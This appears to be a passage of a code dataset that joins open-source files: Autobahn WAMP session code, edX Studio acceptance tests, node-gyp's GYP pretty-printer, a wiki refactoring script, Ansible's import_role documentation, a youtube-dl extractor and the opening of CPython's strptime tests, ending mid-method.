# register all methods on an object decorated with "wamp.register"
on_replies = []
for k in inspect.getmembers(endpoint.__class__, is_method_or_function):
proc = k[1]
if "_wampuris" in proc.__dict__:
for pat in proc.__dict__["_wampuris"]:
if pat.is_endpoint():
uri = pat.uri()
on_replies.append(_register(endpoint, proc, uri, options))
            # XXX needs coverage
return txaio.gather(on_replies, consume_exceptions=True)
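    # Hedged usage sketch (not part of the original source): both a plain callable
    # and an object whose methods are decorated with @wamp.register(...) can be
    # registered; the decorated form is what the "_wampuris" loop above picks up:
    #
    #   from autobahn import wamp
    #
    #   class Calculator(object):
    #       @wamp.register(u"com.example.add2")
    #       def add2(self, a, b):
    #           return a + b
    #
    #   yield session.register(lambda x: x * 2, u"com.example.double")
    #   yield session.register(Calculator())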
def _unregister(self, registration):
"""
Called from :meth:`autobahn.wamp.protocol.Registration.unregister`
"""
assert(isinstance(registration, Registration))
assert registration.active
assert(registration.id in self._registrations)
if not self._transport:
raise exception.TransportLost()
request_id = self._request_id_gen.next()
on_reply = txaio.create_future()
self._unregister_reqs[request_id] = UnregisterRequest(request_id, on_reply, registration.id)
msg = message.Unregister(request_id, registration.id)
self._transport.send(msg)
return on_reply
# IApplicationSession.register collides with the abc.ABCMeta.register method
# IApplicationSession.register(ApplicationSession)
class ApplicationSessionFactory(object):
"""
WAMP endpoint session factory.
"""
session = ApplicationSession
"""
WAMP application session class to be used in this factory.
"""
def __init__(self, config=None):
"""
:param config: The default component configuration.
:type config: instance of :class:`autobahn.wamp.types.ComponentConfig`
"""
self.config = config or types.ComponentConfig(realm=u"default")
def __call__(self):
"""
Creates a new WAMP application session.
:returns: -- An instance of the WAMP application session class as
given by `self.session`.
"""
session = self.session(self.config)
session.factory = self
return session
|
mit
|
franosincic/edx-platform
|
common/test/acceptance/tests/studio/test_studio_settings.py
|
13
|
19722
|
# coding: utf-8
"""
Acceptance tests for Studio's Setting pages
"""
from __future__ import unicode_literals
from nose.plugins.attrib import attr
from base_studio_test import StudioCourseTest
from bok_choy.promise import EmptyPromise
from ...fixtures.course import XBlockFixtureDesc
from ..helpers import create_user_partition_json
from ...pages.studio.overview import CourseOutlinePage
from ...pages.studio.settings import SettingsPage
from ...pages.studio.settings_advanced import AdvancedSettingsPage
from ...pages.studio.settings_group_configurations import GroupConfigurationsPage
from ...pages.lms.courseware import CoursewarePage
from textwrap import dedent
from xmodule.partitions.partitions import Group
@attr('shard_8')
class ContentGroupConfigurationTest(StudioCourseTest):
"""
Tests for content groups in the Group Configurations Page.
There are tests for the experiment groups in test_studio_split_test.
"""
def setUp(self):
super(ContentGroupConfigurationTest, self).setUp()
self.group_configurations_page = GroupConfigurationsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.outline_page = CourseOutlinePage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
def populate_course_fixture(self, course_fixture):
"""
        Populates the test course with a chapter, a sequential, and one problem.
The problem is visible only to Group "alpha".
"""
course_fixture.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
XBlockFixtureDesc('vertical', 'Test Unit')
)
)
)
def create_and_verify_content_group(self, name, existing_groups):
"""
Creates a new content group and verifies that it was properly created.
"""
self.assertEqual(existing_groups, len(self.group_configurations_page.content_groups))
if existing_groups == 0:
self.group_configurations_page.create_first_content_group()
else:
self.group_configurations_page.add_content_group()
config = self.group_configurations_page.content_groups[existing_groups]
config.name = name
# Save the content group
self.assertEqual(config.get_text('.action-primary'), "Create")
self.assertFalse(config.delete_button_is_present)
config.save()
self.assertIn(name, config.name)
return config
def test_no_content_groups_by_default(self):
"""
        Scenario: Ensure that the message telling me to create a new content group is
shown when no content groups exist.
Given I have a course without content groups
When I go to the Group Configuration page in Studio
Then I see "You have not created any content groups yet." message
"""
self.group_configurations_page.visit()
self.assertTrue(self.group_configurations_page.no_content_groups_message_is_present)
self.assertIn(
"You have not created any content groups yet.",
self.group_configurations_page.no_content_groups_message_text
)
def test_can_create_and_edit_content_groups(self):
"""
Scenario: Ensure that the content groups can be created and edited correctly.
Given I have a course without content groups
When I click button 'Add your first Content Group'
        And I set the new name and click the button 'Create'
        Then I see the new content group is added and has correct data
        And I click the 'New Content Group' button
And I set the name and click the button 'Create'
Then I see the second content group is added and has correct data
When I edit the second content group
And I change the name and click the button 'Save'
Then I see the second content group is saved successfully and has the new name
"""
self.group_configurations_page.visit()
self.create_and_verify_content_group("New Content Group", 0)
second_config = self.create_and_verify_content_group("Second Content Group", 1)
# Edit the second content group
second_config.edit()
second_config.name = "Updated Second Content Group"
self.assertEqual(second_config.get_text('.action-primary'), "Save")
second_config.save()
self.assertIn("Updated Second Content Group", second_config.name)
def test_cannot_delete_used_content_group(self):
"""
        Scenario: Ensure that the user cannot delete a used content group.
Given I have a course with 1 Content Group
And I go to the Group Configuration page
When I try to delete the Content Group with name "New Content Group"
Then I see the delete button is disabled.
"""
self.course_fixture._update_xblock(self.course_fixture._course_location, {
"metadata": {
u"user_partitions": [
create_user_partition_json(
0,
'Configuration alpha,',
'Content Group Partition',
[Group("0", 'alpha')],
scheme="cohort"
)
],
},
})
problem_data = dedent("""
<problem markdown="Simple Problem" max_attempts="" weight="">
<p>Choose Yes.</p>
<choiceresponse>
<checkboxgroup>
<choice correct="true">Yes</choice>
</checkboxgroup>
</choiceresponse>
</problem>
""")
vertical = self.course_fixture.get_nested_xblocks(category="vertical")[0]
self.course_fixture.create_xblock(
vertical.locator,
XBlockFixtureDesc('problem', "VISIBLE TO ALPHA", data=problem_data, metadata={"group_access": {0: [0]}}),
)
self.group_configurations_page.visit()
config = self.group_configurations_page.content_groups[0]
self.assertTrue(config.delete_button_is_disabled)
def test_can_delete_unused_content_group(self):
"""
        Scenario: Ensure that the user can delete an unused content group.
Given I have a course with 1 Content Group
And I go to the Group Configuration page
When I delete the Content Group with name "New Content Group"
Then I see that there is no Content Group
When I refresh the page
Then I see that the content group has been deleted
"""
self.group_configurations_page.visit()
config = self.create_and_verify_content_group("New Content Group", 0)
self.assertTrue(config.delete_button_is_present)
self.assertEqual(len(self.group_configurations_page.content_groups), 1)
# Delete content group
config.delete()
self.assertEqual(len(self.group_configurations_page.content_groups), 0)
self.group_configurations_page.visit()
self.assertEqual(len(self.group_configurations_page.content_groups), 0)
def test_must_supply_name(self):
"""
Scenario: Ensure that validation of the content group works correctly.
Given I have a course without content groups
        And I create a new content group without specifying a name and click the button 'Create'
        Then I see the error message "Content Group name is required."
When I set a name and click the button 'Create'
Then I see the content group is saved successfully
"""
self.group_configurations_page.visit()
self.group_configurations_page.create_first_content_group()
config = self.group_configurations_page.content_groups[0]
config.save()
self.assertEqual(config.mode, 'edit')
self.assertEqual("Group name is required", config.validation_message)
config.name = "Content Group Name"
config.save()
self.assertIn("Content Group Name", config.name)
def test_can_cancel_creation_of_content_group(self):
"""
Scenario: Ensure that creation of a content group can be canceled correctly.
Given I have a course without content groups
When I click button 'Add your first Content Group'
        And I set the new name and click the button 'Cancel'
        Then I see that there are no content groups in the course
"""
self.group_configurations_page.visit()
self.group_configurations_page.create_first_content_group()
config = self.group_configurations_page.content_groups[0]
config.name = "Content Group"
config.cancel()
self.assertEqual(0, len(self.group_configurations_page.content_groups))
def test_content_group_empty_usage(self):
"""
        Scenario: When a content group is not used, ensure that the link to the outline page works correctly.
        Given I have a course without content groups
        And I create a new content group
Then I see a link to the outline page
When I click on the outline link
Then I see the outline page
"""
self.group_configurations_page.visit()
config = self.create_and_verify_content_group("New Content Group", 0)
config.toggle()
config.click_outline_anchor()
# Waiting for the page load and verify that we've landed on course outline page
EmptyPromise(
lambda: self.outline_page.is_browser_on_page(), "loaded page {!r}".format(self.outline_page),
timeout=30
).fulfill()
@attr('shard_8')
class AdvancedSettingsValidationTest(StudioCourseTest):
"""
Tests for validation feature in Studio's advanced settings tab
"""
def setUp(self):
super(AdvancedSettingsValidationTest, self).setUp()
self.advanced_settings = AdvancedSettingsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.type_fields = ['Course Display Name', 'Advanced Module List', 'Discussion Topic Mapping',
'Maximum Attempts', 'Course Announcement Date']
# Before every test, make sure to visit the page first
self.advanced_settings.visit()
self.assertTrue(self.advanced_settings.is_browser_on_page())
def test_modal_shows_one_validation_error(self):
"""
Test that advanced settings don't save if there's a single wrong input,
and that it shows the correct error message in the modal.
"""
# Feed an integer value for String field.
# .set method saves automatically after setting a value
course_display_name = self.advanced_settings.get('Course Display Name')
self.advanced_settings.set('Course Display Name', 1)
self.advanced_settings.wait_for_modal_load()
# Test Modal
self.check_modal_shows_correct_contents(['Course Display Name'])
self.advanced_settings.refresh_and_wait_for_load()
self.assertEquals(
self.advanced_settings.get('Course Display Name'),
course_display_name,
'Wrong input for Course Display Name must not change its value'
)
def test_modal_shows_multiple_validation_errors(self):
"""
Test that advanced settings don't save with multiple wrong inputs
"""
# Save original values and feed wrong inputs
original_values_map = self.get_settings_fields_of_each_type()
self.set_wrong_inputs_to_fields()
self.advanced_settings.wait_for_modal_load()
# Test Modal
self.check_modal_shows_correct_contents(self.type_fields)
self.advanced_settings.refresh_and_wait_for_load()
for key, val in original_values_map.iteritems():
self.assertEquals(
self.advanced_settings.get(key),
val,
'Wrong input for Advanced Settings Fields must not change its value'
)
def test_undo_changes(self):
"""
        Test that the undo changes button in the modal resets all settings changes
"""
# Save original values and feed wrong inputs
original_values_map = self.get_settings_fields_of_each_type()
self.set_wrong_inputs_to_fields()
# Let modal popup
self.advanced_settings.wait_for_modal_load()
# Click Undo Changes button
self.advanced_settings.undo_changes_via_modal()
# Check that changes are undone
for key, val in original_values_map.iteritems():
self.assertEquals(
self.advanced_settings.get(key),
val,
                'Undoing should revert to the original value'
)
def test_manual_change(self):
"""
        Test that the manual changes button in the modal keeps settings unchanged
"""
inputs = {"Course Display Name": 1,
"Advanced Module List": 1,
"Discussion Topic Mapping": 1,
"Maximum Attempts": '"string"',
"Course Announcement Date": '"string"',
}
self.set_wrong_inputs_to_fields()
self.advanced_settings.wait_for_modal_load()
self.advanced_settings.trigger_manual_changes()
# Check that the validation modal went away.
self.assertFalse(self.advanced_settings.is_validation_modal_present())
# Iterate through the wrong values and make sure they're still displayed
for key, val in inputs.iteritems():
self.assertEquals(
str(self.advanced_settings.get(key)),
str(val),
'manual change should keep: ' + str(val) + ', but is: ' + str(self.advanced_settings.get(key))
)
def check_modal_shows_correct_contents(self, wrong_settings_list):
"""
Helper function that checks if the validation modal contains correct
error messages.
"""
# Check presence of modal
self.assertTrue(self.advanced_settings.is_validation_modal_present())
# List of wrong settings item & what is presented in the modal should be the same
error_item_names = self.advanced_settings.get_error_item_names()
self.assertEqual(set(wrong_settings_list), set(error_item_names))
error_item_messages = self.advanced_settings.get_error_item_messages()
self.assertEqual(len(error_item_names), len(error_item_messages))
def get_settings_fields_of_each_type(self):
"""
Get one of each field type:
- String: Course Display Name
- List: Advanced Module List
- Dict: Discussion Topic Mapping
- Integer: Maximum Attempts
- Date: Course Announcement Date
"""
return {
"Course Display Name": self.advanced_settings.get('Course Display Name'),
"Advanced Module List": self.advanced_settings.get('Advanced Module List'),
"Discussion Topic Mapping": self.advanced_settings.get('Discussion Topic Mapping'),
"Maximum Attempts": self.advanced_settings.get('Maximum Attempts'),
"Course Announcement Date": self.advanced_settings.get('Course Announcement Date'),
}
def set_wrong_inputs_to_fields(self):
"""
Set wrong values for the chosen fields
"""
self.advanced_settings.set_values(
{
"Course Display Name": 1,
"Advanced Module List": 1,
"Discussion Topic Mapping": 1,
"Maximum Attempts": '"string"',
"Course Announcement Date": '"string"',
}
)
def test_only_expected_fields_are_displayed(self):
"""
Scenario: The Advanced Settings screen displays settings/fields not specifically hidden from
view by a developer.
Given I have a set of CourseMetadata fields defined for the course
When I view the Advanced Settings screen for the course
The total number of fields displayed matches the number I expect
And the actual fields displayed match the fields I expect to see
"""
expected_fields = self.advanced_settings.expected_settings_names
displayed_fields = self.advanced_settings.displayed_settings_names
self.assertEquals(set(displayed_fields), set(expected_fields))
@attr('shard_1')
class ContentLicenseTest(StudioCourseTest):
"""
    Tests for course-level licensing (that is, setting the license
    for an entire course's content to All Rights Reserved or Creative Commons)
"""
def setUp(self): # pylint: disable=arguments-differ
super(ContentLicenseTest, self).setUp()
self.outline_page = CourseOutlinePage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.settings_page = SettingsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.lms_courseware = CoursewarePage(
self.browser,
self.course_id,
)
self.settings_page.visit()
def test_empty_license(self):
"""
When I visit the Studio settings page,
I see that the course license is "All Rights Reserved" by default.
Then I visit the LMS courseware page,
and I see that the default course license is displayed.
"""
self.assertEqual(self.settings_page.course_license, "All Rights Reserved")
self.lms_courseware.visit()
self.assertEqual(self.lms_courseware.course_license, "© All Rights Reserved")
def test_arr_license(self):
"""
When I visit the Studio settings page,
and I set the course license to "All Rights Reserved",
and I refresh the page,
I see that the course license is "All Rights Reserved".
Then I visit the LMS courseware page,
and I see that the course license is "All Rights Reserved".
"""
self.settings_page.course_license = "All Rights Reserved"
self.settings_page.save_changes()
self.settings_page.refresh_and_wait_for_load()
self.assertEqual(self.settings_page.course_license, "All Rights Reserved")
self.lms_courseware.visit()
self.assertEqual(self.lms_courseware.course_license, "© All Rights Reserved")
def test_cc_license(self):
"""
When I visit the Studio settings page,
and I set the course license to "Creative Commons",
and I refresh the page,
I see that the course license is "Creative Commons".
Then I visit the LMS courseware page,
and I see that the course license is "Some Rights Reserved".
"""
self.settings_page.course_license = "Creative Commons"
self.settings_page.save_changes()
self.settings_page.refresh_and_wait_for_load()
self.assertEqual(self.settings_page.course_license, "Creative Commons")
self.lms_courseware.visit()
# The course_license text will include a bunch of screen reader text to explain
# the selected options
self.assertIn("Some Rights Reserved", self.lms_courseware.course_license)
|
agpl-3.0
|
hseifeddine/dashviz-mean
|
node_modules/node-gyp/gyp/tools/pretty_gyp.py
|
2618
|
4756
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Pretty-prints the contents of a GYP file."""
import sys
import re
# Regex to remove comments when we're counting braces.
COMMENT_RE = re.compile(r'\s*#.*')
# Regex to remove quoted strings when we're counting braces.
# It takes into account quoted quotes, and makes sure that the quotes match.
# NOTE: It does not handle quotes that span more than one line, or
# cases where an escaped quote is preceded by an escaped backslash.
QUOTE_RE_STR = r'(?P<q>[\'"])(.*?)(?<![^\\][\\])(?P=q)'
QUOTE_RE = re.compile(QUOTE_RE_STR)
def comment_replace(matchobj):
return matchobj.group(1) + matchobj.group(2) + '#' * len(matchobj.group(3))
def mask_comments(input):
"""Mask the quoted strings so we skip braces inside quoted strings."""
search_re = re.compile(r'(.*?)(#)(.*)')
return [search_re.sub(comment_replace, line) for line in input]
def quote_replace(matchobj):
return "%s%s%s%s" % (matchobj.group(1),
matchobj.group(2),
'x'*len(matchobj.group(3)),
matchobj.group(2))
def mask_quotes(input):
"""Mask the quoted strings so we skip braces inside quoted strings."""
search_re = re.compile(r'(.*?)' + QUOTE_RE_STR)
return [search_re.sub(quote_replace, line) for line in input]
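# Illustrative example (not part of the original file): mask_quotes() keeps line
# lengths intact but blanks out quoted content with 'x', so braces inside strings
# are not counted, e.g.:
#   mask_quotes(["{'a': 'b{c}'}"])  ->  ["{'x': 'xxxx'}"]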
def do_split(input, masked_input, search_re):
output = []
mask_output = []
for (line, masked_line) in zip(input, masked_input):
m = search_re.match(masked_line)
while m:
split = len(m.group(1))
line = line[:split] + r'\n' + line[split:]
masked_line = masked_line[:split] + r'\n' + masked_line[split:]
m = search_re.match(masked_line)
output.extend(line.split(r'\n'))
mask_output.extend(masked_line.split(r'\n'))
return (output, mask_output)
def split_double_braces(input):
"""Masks out the quotes and comments, and then splits appropriate
     lines (lines that match the double_*_brace re's above) before
indenting them below.
These are used to split lines which have multiple braces on them, so
that the indentation looks prettier when all laid out (e.g. closing
braces make a nice diagonal line).
"""
double_open_brace_re = re.compile(r'(.*?[\[\{\(,])(\s*)([\[\{\(])')
double_close_brace_re = re.compile(r'(.*?[\]\}\)],?)(\s*)([\]\}\)])')
masked_input = mask_quotes(input)
masked_input = mask_comments(masked_input)
(output, mask_output) = do_split(input, masked_input, double_open_brace_re)
(output, mask_output) = do_split(output, mask_output, double_close_brace_re)
return output
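# Illustrative example (not part of the original file): a line that opens two
# scopes is split so that each brace can be indented on its own line, e.g.:
#   split_double_braces(["'targets': [{"])  ->  ["'targets': [", "{"]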
def count_braces(line):
"""keeps track of the number of braces on a given line and returns the result.
It starts at zero and subtracts for closed braces, and adds for open braces.
"""
open_braces = ['[', '(', '{']
close_braces = [']', ')', '}']
closing_prefix_re = re.compile(r'(.*?[^\s\]\}\)]+.*?)([\]\}\)],?)\s*$')
cnt = 0
stripline = COMMENT_RE.sub(r'', line)
stripline = QUOTE_RE.sub(r"''", stripline)
for char in stripline:
for brace in open_braces:
if char == brace:
cnt += 1
for brace in close_braces:
if char == brace:
cnt -= 1
after = False
if cnt > 0:
after = True
# This catches the special case of a closing brace having something
# other than just whitespace ahead of it -- we don't want to
# unindent that until after this line is printed so it stays with
# the previous indentation level.
if cnt < 0 and closing_prefix_re.match(stripline):
after = True
return (cnt, after)
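# Illustrative example (not part of the original file): the returned count is the
# net brace delta for the line and the flag says whether to indent only after the
# line has been printed, e.g.:
#   count_braces("'targets': [")  ->  (1, True)
#   count_braces("}],")           ->  (-2, False)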
def prettyprint_input(lines):
"""Does the main work of indenting the input based on the brace counts."""
indent = 0
basic_offset = 2
last_line = ""
for line in lines:
if COMMENT_RE.match(line):
print line
else:
line = line.strip('\r\n\t ') # Otherwise doesn't strip \r on Unix.
if len(line) > 0:
(brace_diff, after) = count_braces(line)
if brace_diff != 0:
if after:
print " " * (basic_offset * indent) + line
indent += brace_diff
else:
indent += brace_diff
print " " * (basic_offset * indent) + line
else:
print " " * (basic_offset * indent) + line
else:
print ""
last_line = line
def main():
if len(sys.argv) > 1:
data = open(sys.argv[1]).read().splitlines()
else:
data = sys.stdin.read().splitlines()
# Split up the double braces.
lines = split_double_braces(data)
# Indent and print the output.
prettyprint_input(lines)
return 0
if __name__ == '__main__':
sys.exit(main())
|
mit
|
101companies/101dev
|
tools/wikiRefactoring/refactor.py
|
4
|
1406
|
import sys
import getpass
from wikitools import wiki
import page2
import category2
apiurl = "http://mediawiki.101companies.org/api.php"
wiki101 = wiki.Wiki(apiurl)
def dorename(titles, flags):
if len(titles) < 2:
exit("Need two titles to do renaming")
if titles[0].startswith("Category:"):
p = category2.Category2(wiki101, title=titles[0])
else:
p = page2.Page2(wiki101, title=titles[0])
p.intermove(mvto=titles[1], **flags)
def dopromote(titles, flags):
p = page2.Page2(wiki101, title=titles[0])
if len(titles) > 1:
ntitle = titles[1]
else:
ntitle = False
p.promote(title=ntitle, **flags)
def dodemote(titles, flags):
p = category2.Category2(wiki101, title=titles[0])
if len(titles) > 1:
ntitle = titles[1]
else:
ntitle = False
p.demote(title=ntitle, **flags)
commands = dict(rename=dorename, promote=dopromote, demote=dodemote)
if len(sys.argv) < 3 or not commands.has_key(sys.argv[1]):
exit("Syntax: (rename|demote|promote) <title1> [<title2>] [-- <flags>]")
if (len(sys.argv) > 3 and sys.argv[3] == "--"):
titles = sys.argv[2:3]
rawflags = sys.argv[4:]
elif (len(sys.argv) > 4 and sys.argv[4] == "--"):
titles = sys.argv[2:4]
rawflags = sys.argv[5:]
else:
titles = sys.argv[2:]
rawflags = []
flags = {}
for flag in rawflags:
flags[flag] = True
wiki101.login(raw_input("Wikisername: "), getpass.getpass("Password: "))
commands[sys.argv[1]](titles, flags)
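# Illustrative invocation sketch (not part of the original file; "someFlag" is a
# hypothetical flag name, since anything after "--" is simply passed through as True):
#   python refactor.py rename "Category:Old name" "Category:New name" -- someFlag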
|
gpl-3.0
|
sestrella/ansible
|
lib/ansible/modules/utilities/logic/import_role.py
|
28
|
2837
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'
}
DOCUMENTATION = r'''
---
author: Ansible Core Team (@ansible)
module: import_role
short_description: Import a role into a play
description:
  - Much like the C(roles:) keyword, this task loads a role, but it allows you to control when the role tasks run in
between other tasks of the play.
- Most keywords, loops and conditionals will only be applied to the imported tasks, not to this statement itself. If
you want the opposite behavior, use M(include_role) instead.
version_added: '2.4'
options:
name:
description:
- The name of the role to be executed.
type: str
required: true
tasks_from:
description:
- File to load from a role's C(tasks/) directory.
type: str
default: main
vars_from:
description:
- File to load from a role's C(vars/) directory.
type: str
default: main
defaults_from:
description:
- File to load from a role's C(defaults/) directory.
type: str
default: main
allow_duplicates:
description:
- Overrides the role's metadata setting to allow using a role more than once with the same parameters.
type: bool
default: yes
handlers_from:
description:
- File to load from a role's C(handlers/) directory.
type: str
default: main
version_added: '2.8'
notes:
- Handlers are made available to the whole play.
- Since Ansible 2.7 variables defined in C(vars) and C(defaults) for the role are exposed at playbook parsing time.
Due to this, these variables will be accessible to roles and tasks executed before the location of the
M(import_role) task.
  - Unlike M(include_role), variable exposure is not configurable and variables will always be exposed.
seealso:
- module: import_playbook
- module: import_tasks
- module: include_role
- module: include_tasks
- ref: playbooks_reuse_includes
description: More information related to including and importing playbooks, roles and tasks.
'''
EXAMPLES = r'''
- hosts: all
tasks:
- import_role:
name: myrole
- name: Run tasks/other.yaml instead of 'main'
import_role:
name: myrole
tasks_from: other
- name: Pass variables to role
import_role:
name: myrole
vars:
rolevar1: value from task
- name: Apply condition to each task in role
import_role:
name: myrole
when: not idontwanttorun
'''
RETURN = r'''
# This module does not return anything except tasks to execute.
'''
|
gpl-3.0
|
phihag/youtube-dl
|
youtube_dl/extractor/echomsk.py
|
90
|
1317
|
# coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
class EchoMskIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?echo\.msk\.ru/sounds/(?P<id>\d+)'
_TEST = {
'url': 'http://www.echo.msk.ru/sounds/1464134.html',
'md5': '2e44b3b78daff5b458e4dbc37f191f7c',
'info_dict': {
'id': '1464134',
'ext': 'mp3',
'title': 'Особое мнение - 29 декабря 2014, 19:08',
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
audio_url = self._search_regex(
r'<a rel="mp3" href="([^"]+)">', webpage, 'audio URL')
title = self._html_search_regex(
r'<a href="/programs/[^"]+" target="_blank">([^<]+)</a>',
webpage, 'title')
air_date = self._html_search_regex(
r'(?s)<div class="date">(.+?)</div>',
webpage, 'date', fatal=False, default=None)
if air_date:
air_date = re.sub(r'(\s)\1+', r'\1', air_date)
if air_date:
title = '%s - %s' % (title, air_date)
return {
'id': video_id,
'url': audio_url,
'title': title,
}
|
unlicense
|
xbmc/xbmc-antiquated
|
xbmc/lib/libPython/Python/Lib/test/test_strptime.py
|
12
|
23211
|
"""PyUnit testing against strptime"""
import unittest
import time
import locale
import re
import sys
from test import test_support
from datetime import date as datetime_date
import _strptime
class getlang_Tests(unittest.TestCase):
"""Test _getlang"""
def test_basic(self):
self.failUnlessEqual(_strptime._getlang(), locale.getlocale(locale.LC_TIME))
class LocaleTime_Tests(unittest.TestCase):
"""Tests for _strptime.LocaleTime.
All values are lower-cased when stored in LocaleTime, so make sure to
compare values after running ``lower`` on them.
"""
def setUp(self):
"""Create time tuple based on current time."""
self.time_tuple = time.localtime()
self.LT_ins = _strptime.LocaleTime()
def compare_against_time(self, testing, directive, tuple_position,
error_msg):
"""Helper method that tests testing against directive based on the
tuple_position of time_tuple. Uses error_msg as error message.
"""
strftime_output = time.strftime(directive, self.time_tuple).lower()
comparison = testing[self.time_tuple[tuple_position]]
self.failUnless(strftime_output in testing, "%s: not found in tuple" %
error_msg)
self.failUnless(comparison == strftime_output,
"%s: position within tuple incorrect; %s != %s" %
(error_msg, comparison, strftime_output))
def test_weekday(self):
# Make sure that full and abbreviated weekday names are correct in
# both string and position with tuple
self.compare_against_time(self.LT_ins.f_weekday, '%A', 6,
"Testing of full weekday name failed")
self.compare_against_time(self.LT_ins.a_weekday, '%a', 6,
"Testing of abbreviated weekday name failed")
def test_month(self):
# Test full and abbreviated month names; both string and position
# within the tuple
self.compare_against_time(self.LT_ins.f_month, '%B', 1,
"Testing against full month name failed")
self.compare_against_time(self.LT_ins.a_month, '%b', 1,
"Testing against abbreviated month name failed")
def test_am_pm(self):
# Make sure AM/PM representation done properly
strftime_output = time.strftime("%p", self.time_tuple).lower()
self.failUnless(strftime_output in self.LT_ins.am_pm,
"AM/PM representation not in tuple")
if self.time_tuple[3] < 12: position = 0
else: position = 1
self.failUnless(strftime_output == self.LT_ins.am_pm[position],
"AM/PM representation in the wrong position within the tuple")
def test_timezone(self):
# Make sure timezone is correct
timezone = time.strftime("%Z", self.time_tuple).lower()
if timezone:
self.failUnless(timezone in self.LT_ins.timezone[0] or \
timezone in self.LT_ins.timezone[1],
"timezone %s not found in %s" %
(timezone, self.LT_ins.timezone))
def test_date_time(self):
# Check that LC_date_time, LC_date, and LC_time are correct
        # The magic date is used so as not to have issues with %c when the day of
# the month is a single digit and has a leading space. This is not an
# issue since strptime still parses it correctly. The problem is
# testing these directives for correctness by comparing strftime
# output.
magic_date = (1999, 3, 17, 22, 44, 55, 2, 76, 0)
strftime_output = time.strftime("%c", magic_date)
self.failUnless(strftime_output == time.strftime(self.LT_ins.LC_date_time,
magic_date),
"LC_date_time incorrect")
strftime_output = time.strftime("%x", magic_date)
self.failUnless(strftime_output == time.strftime(self.LT_ins.LC_date,
magic_date),
"LC_date incorrect")
strftime_output = time.strftime("%X", magic_date)
self.failUnless(strftime_output == time.strftime(self.LT_ins.LC_time,
magic_date),
"LC_time incorrect")
LT = _strptime.LocaleTime()
LT.am_pm = ('', '')
self.failUnless(LT.LC_time, "LocaleTime's LC directives cannot handle "
"empty strings")
def test_lang(self):
# Make sure lang is set to what _getlang() returns
# Assuming locale has not changed between now and when self.LT_ins was created
self.failUnlessEqual(self.LT_ins.lang, _strptime._getlang())
class TimeRETests(unittest.TestCase):
"""Tests for TimeRE."""
def setUp(self):
"""Construct generic TimeRE object."""
self.time_re = _strptime.TimeRE()
self.locale_time = _strptime.LocaleTime()
def test_pattern(self):
# Test TimeRE.pattern
pattern_string = self.time_re.pattern(r"%a %A %d")
self.failUnless(pattern_string.find(self.locale_time.a_weekday[2]) != -1,
"did not find abbreviated weekday in pattern string '%s'" %
pattern_string)
self.failUnless(pattern_string.find(self.locale_time.f_weekday[4]) != -1,
"did not find full weekday in pattern string '%s'" %
pattern_string)
self.failUnless(pattern_string.find(self.time_re['d']) != -1,
"did not find 'd' directive pattern string '%s'" %
pattern_string)
def test_pattern_escaping(self):
# Make sure any characters in the format string that might be taken as
# regex syntax is escaped.
pattern_string = self.time_re.pattern("\d+")
self.failUnless(r"\\d\+" in pattern_string,
"%s does not have re characters escaped properly" %
pattern_string)
def test_compile(self):
# Check that compiled regex is correct
found = self.time_re.compile(r"%A").match(self.locale_time.f_weekday[6])
self.failUnless(found and found.group('A') == self.locale_time.f_weekday[6],
"re object for '%A' failed")
compiled = self.time_re.compile(r"%a %b")
found = compiled.match("%s %s" % (self.locale_time.a_weekday[4],
self.locale_time.a_month[4]))
self.failUnless(found,
"Match failed with '%s' regex and '%s' string" %
(compiled.pattern, "%s %s" % (self.locale_time.a_weekday[4],
self.locale_time.a_month[4])))
self.failUnless(found.group('a') == self.locale_time.a_weekday[4] and
found.group('b') == self.locale_time.a_month[4],
"re object couldn't find the abbreviated weekday month in "
"'%s' using '%s'; group 'a' = '%s', group 'b' = %s'" %
(found.string, found.re.pattern, found.group('a'),
found.group('b')))
for directive in ('a','A','b','B','c','d','H','I','j','m','M','p','S',
'U','w','W','x','X','y','Y','Z','%'):
compiled = self.time_re.compile("%" + directive)
found = compiled.match(time.strftime("%" + directive))
self.failUnless(found, "Matching failed on '%s' using '%s' regex" %
(time.strftime("%" + directive),
compiled.pattern))
def test_blankpattern(self):
        # Make sure that when a tuple has no values, no regex is generated.
# Fixes bug #661354
test_locale = _strptime.LocaleTime()
test_locale.timezone = (frozenset(), frozenset())
self.failUnless(_strptime.TimeRE(test_locale).pattern("%Z") == '',
"with timezone == ('',''), TimeRE().pattern('%Z') != ''")
def test_matching_with_escapes(self):
# Make sure a format that requires escaping of characters works
compiled_re = self.time_re.compile("\w+ %m")
found = compiled_re.match("\w+ 10")
self.failUnless(found, "Escaping failed of format '\w+ 10'")
def test_locale_data_w_regex_metacharacters(self):
# Check that if locale data contains regex metacharacters they are
# escaped properly.
# Discovered by bug #1039270 .
locale_time = _strptime.LocaleTime()
locale_time.timezone = (frozenset(("utc", "gmt",
"Tokyo (standard time)")),
frozenset("Tokyo (daylight time)"))
time_re = _strptime.TimeRE(locale_time)
self.failUnless(time_re.compile("%Z").match("Tokyo (standard time)"),
"locale data that contains regex metacharacters is not"
" properly escaped")
class StrptimeTests(unittest.TestCase):
"""Tests for _strptime.strptime."""
def setUp(self):
"""Create testing time tuple."""
self.time_tuple = time.gmtime()
def test_TypeError(self):
# Make sure ValueError is raised when match fails
self.assertRaises(ValueError, _strptime.strptime, data_string="%d",
format="%A")
def test_unconverteddata(self):
# Check ValueError is raised when there is unconverted data
self.assertRaises(ValueError, _strptime.strptime, "10 12", "%m")
def helper(self, directive, position):
